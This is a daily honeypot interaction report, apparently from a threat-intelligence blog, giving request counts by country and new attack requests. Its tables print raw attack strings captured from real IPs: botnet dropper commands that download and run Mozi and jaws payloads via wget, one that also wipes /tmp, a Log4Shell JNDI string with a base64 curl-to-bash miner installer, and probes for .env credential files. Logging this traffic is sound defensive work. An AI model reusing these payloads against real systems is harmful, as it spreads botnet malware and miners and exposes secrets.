Skip to main content
  1. Daily-Posts/

Report: 2025-07-02

·450 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-02
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 30 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1568 requests were recorded during the day, originating from 3 different countries, with a peak of 634 requests coming from CH.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
BRGermany
USGermany
USGermany
JPGermany
USGermany
CHIsrael

botnet_dropper_behaviour
#

remote_addrrequest
103.98.37.18227;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
156.218.60.24GET /shell?cd+/tmp;rm+-rf+*;wget+38.57.46.116/jaws;sh+/tmp/jaws HTTP/1.1
95.214.53.84GET /vpn/list_base_config.php?type=mod&parts=base_config&template=`wget+http://220.158.234.135/x/raisecom+-O-

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1942GET /dev/.env.aws HTTP/1.1
1962GET /dev/.env.BAK HTTP/1.1
1992GET /env/test.ini HTTP/1.1
2012GET /helpers/.env HTTP/1.1
2042GET /dev/.env.crt HTTP/1.1
2092GET /keys/env.php HTTP/1.1
2162GET /core/.env.db HTTP/1.1
2182GET /dev/.env.bkp HTTP/1.1
2192GET /cypress/.env HTTP/1.1
2462GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==%7D%27%29 HTTP/1.1
2642GET /cgi-bin/index.html HTTP/1.1
3301GET /odinhttpcall1751449606 HTTP/1.1
3311GET /OdinHttpCall1751449606 HTTP/1.1
3321GET /Odin/http/call1751449606 HTTP/1.1
3691GET /admin/.env.2 HTTP/1.1
3831GET /database.env HTTP/1.1
3841GET /flask/env.py HTTP/1.1
3851GET /env/smtp.bak HTTP/1.1
3881GET /dev/.env.gcp HTTP/1.1
3891GET /dev/.env.key HTTP/1.1
3911GET /dev/.env.log HTTP/1.1
3921GET /dev/.env.new HTTP/1.1
3931GET /.env_session HTTP/1.1
4061GET /s/734323e21363e2932313e27353/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
4091GET /NadI HTTP/1.1
4101GET /I3kv HTTP/1.1
4361GET http://whatismyip.akamai.com/ HTTP/1.1
4371GET /odinhttpcall1751457181 HTTP/1.1
4381GET /OdinHttpCall1751457181 HTTP/1.1
4391GET /Odin/http/call1751457181 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0634CH
1276US
2143GB
3129DE
457NL
548BG
646VN
730JP
822PL
918CA
1017CN
1117ZA
1214RU
1311SC
1410DO
159LT
169BR
178RO
186AO
195UA
205GH
215IN
224SG
234KR
244HK
254BE
263IR
273ES
283NG
293PT
303KZ
312TR
322MN
332SE
342EE
352IE
362DZ
372BD
381EG
391IT
401FR
411HR

Related

Report: 2025-07-01
·339 words
Repport Daily
Report: 2025-06-30
·354 words
Repport Daily
Report: 2025-06-29
·309 words
Repport Daily